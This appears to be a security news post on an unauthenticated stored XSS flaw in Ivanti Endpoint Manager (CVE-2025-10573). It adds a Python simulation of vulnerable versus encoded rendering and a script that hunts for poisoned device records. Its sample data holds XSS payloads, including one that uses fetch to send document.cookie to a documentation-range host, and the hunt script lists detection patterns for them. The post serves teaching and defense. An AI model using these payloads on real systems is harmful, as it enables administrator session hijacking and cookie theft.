Cyber Web Spider Blog – News

Critical Ivanti EPM Vulnerability Allows Admin Session Hijacking via Stored XSS

Posted on December 10, 2025, updated December 11, 2025, by CWS

A critical stored cross-site scripting (XSS) vulnerability in Ivanti Endpoint Manager (“EPM”) versions 2024 SU4 and below could enable attackers to hijack administrator sessions without authentication.

The vulnerability, identified as CVE-2025-10573, carries a CVSS score of 9.6 and was patched on December 9, 2025, with the release of Ivanti EPM version 2024 SU4 SR1.

An attacker with unauthenticated access to the primary EPM web service can join fake managed endpoints to the EPM server, poisoning the administrator’s web dashboard with malicious JavaScript. When an Ivanti EPM administrator views the contaminated dashboard during normal operations, that passive interaction is enough to trigger client-side JavaScript execution, granting the attacker complete control of the administrator’s session.

Attribute            Details
CVE ID               CVE-2025-10573
Vulnerability Type   Stored Cross-Site Scripting (XSS)
CVSS Score           9.6
Affected Product     Ivanti Endpoint Manager (EPM)
Affected Versions    EPM 2024 SU4 and below

The vulnerability stems from the ‘incomingdata’ web API, which processes device scan data without proper input validation.

Attackers can submit malicious payloads through this unauthenticated endpoint. The payloads are stored in the device database and later rendered without output encoding in the administrator dashboard interface, which is what turns stored data into executing script.

An unauthenticated attacker can craft a POST request to the ‘/incomingdata/postcgi.exe’ endpoint containing XSS payloads embedded in device scan fields such as Device ID, Display Name, or OS Name.

These payloads are processed automatically and added to the device database without sanitization. When administrators open web dashboard pages that display device information, including ‘frameset.aspx’ and ‘db_frameset.aspx’, the malicious scripts execute in their browsers.
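To make the mechanism above concrete, here is an added Python simulation (not Ivanti code: only the three field names come from the advisory; the payload, the HTML row template and the in-memory “database” are constructed for illustration). A scan record is stored exactly as received, then rendered three ways: raw interpolation is the sink described above; stripping <script> tags at ingestion, a common half-fix, is bypassed by an event-handler attribute on another tag; HTML-encoding each field at the point of output is what neutralizes the stored payload.

```python
"""Simulated device inventory: unauthenticated scan ingest, then dashboard
rendering.  Constructed example, not Ivanti code; only the field names
(Device ID, Display Name, OS Name) are taken from the advisory."""
import html
import re

# Constructed attacker submission, as it might arrive in a scan POST.
# The payload is a generic stored-XSS probe, not one seen in the wild.
MALICIOUS_SCAN = {
    "Device ID": "DEV-0001",
    "Display Name": '<img src=x onerror="alert(document.cookie)">',
    "OS Name": "Windows 11",
}

DEVICE_DB = []  # stands in for the device database


def ingest_scan(scan):
    """Vulnerable ingestion: stores whatever the endpoint receives, unvalidated."""
    DEVICE_DB.append(dict(scan))
    return len(DEVICE_DB) - 1


ROW = "<tr><td>{id}</td><td>{name}</td><td>{os}</td></tr>"


def render_row_vulnerable(rec):
    """Interpolates stored fields straight into HTML: this is the XSS sink."""
    return ROW.format(id=rec["Device ID"], name=rec["Display Name"], os=rec["OS Name"])


_SCRIPT_TAG = re.compile(r"</?script[^>]*>", re.IGNORECASE)


def render_row_blocklist(rec):
    """Half-fix: strip <script> tags before rendering.  Still exploitable,
    because event-handler attributes on any other tag also run JavaScript."""
    cleaned = {k: _SCRIPT_TAG.sub("", v) for k, v in rec.items()}
    return render_row_vulnerable(cleaned)


def render_row_encoded(rec):
    """Hardened: HTML-encode every stored field at the point of output, so the
    browser sees text, not markup, regardless of what was stored."""
    enc = {k: html.escape(v, quote=True) for k, v in rec.items()}
    return ROW.format(id=enc["Device ID"], name=enc["Display Name"], os=enc["OS Name"])


def executable_markup(fragment):
    """Crude sink check: does the rendered HTML still contain a tag carrying an
    on*= handler, or a <script> tag?  Browsers parse more leniently than this
    regex; it is enough to contrast the three renderers."""
    return (re.search(r"<\w+[^>]*\bon\w+\s*=", fragment, re.IGNORECASE) is not None
            or re.search(r"<script", fragment, re.IGNORECASE) is not None)


if __name__ == "__main__":
    rec = DEVICE_DB[ingest_scan(MALICIOUS_SCAN)]
    for label, render in (("vulnerable", render_row_vulnerable),
                          ("blocklist", render_row_blocklist),
                          ("encoded", render_row_encoded)):
        out = render(rec)
        print(f"{label:10s} executable={executable_markup(out)!s:5s} {out}")
```

The advisory faults both missing input validation at ‘incomingdata’ and unsafe rendering in the dashboard; output encoding is the control that closes the sink, and rejecting markup and control characters in identifier fields at ingestion is worthwhile defense in depth, not a substitute.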

Ivanti EPM is a widely deployed endpoint management software used by organizations for remote administration, vulnerability scanning, and compliance management.

Successful exploitation hands the attacker an authenticated administrator session in a console built to manage endpoints, so the attacker can remotely control those endpoints and install unauthorized software, which makes this vulnerability particularly dangerous.

According to Rapid7, organizations should immediately upgrade to Ivanti EPM version 2024 SU4 SR1. Because the vulnerable endpoint requires no authentication, patching affected instances as soon as possible is critical.
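Upgrading removes the rendering flaw, but a practitioner will also want to know whether fake endpoints were joined before the patch went on. The following Python hunt is an added example, not a tool from Ivanti or Rapid7: it scans a device inventory export for HTML or script markers in the scan-populated fields. The CSV sample, its column layout, and the 203.0.113.9 address are constructed; only the three field names come from the advisory.

```python
"""Hunt for poisoned device records: flag inventory rows whose scan-populated
identifier fields carry HTML or script markers.  Constructed example, not an
Ivanti or Rapid7 tool; the export format is an assumption."""
import csv
import io
import re

# Constructed CSV export.  The last two rows show what a poisoning attempt via
# the unauthenticated scan endpoint might leave behind; 203.0.113.9 is a
# documentation-range address, not a real indicator.
EXPORT = """Device ID,Display Name,OS Name,Last Scan
DEV-0001,WS-FIN-042,Windows 11 Enterprise,2025-12-08 09:14
DEV-0002,SRV-DB-01,Windows Server 2022,2025-12-08 09:20
DEV-0003,"<script src=//203.0.113.9/a.js></script>",Windows 10,2025-12-09 02:41
DEV-0004,LAPTOP-7,"Win<img src=x onerror=fetch('//203.0.113.9/'+document.cookie)>",2025-12-09 02:42
"""

# Fields the advisory names as reaching the dashboard unsanitized.
WATCHED_FIELDS = ("Device ID", "Display Name", "OS Name")

# Markers that have no business in a hostname or OS string.
MARKERS = [
    re.compile(r"<\s*/?\s*[a-z]", re.I),          # any HTML tag
    re.compile(r"\bon[a-z]+\s*=", re.I),          # event-handler attribute
    re.compile(r"javascript\s*:", re.I),          # javascript: URL
    re.compile(r"&#x?[0-9a-f]+;?", re.I),         # numeric entity smuggling
    re.compile(r"[\x00-\x08\x0b\x0c\x0e-\x1f]"),  # control characters
]


def suspicious(value):
    """Return the patterns that matched, empty when the value looks clean."""
    return [m.pattern for m in MARKERS if m.search(value)]


def hunt(csv_text):
    """Return (device_id, field, matched_patterns) for every suspicious field."""
    hits = []
    for row in csv.DictReader(io.StringIO(csv_text)):
        for field in WATCHED_FIELDS:
            reasons = suspicious(row.get(field, ""))
            if reasons:
                hits.append((row["Device ID"], field, reasons))
    return hits


if __name__ == "__main__":
    for device, field, why in hunt(EXPORT):
        print(f"{device}: field {field!r} matched {len(why)} marker(s)")
```

Review any flagged record in a text export rather than in the web console until the upgrade is in place, since opening the poisoned row in an unpatched dashboard is exactly the trigger described above. Such a record is also evidence that the unauthenticated endpoint was used against the server, which should widen the incident scope beyond the patch itself.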
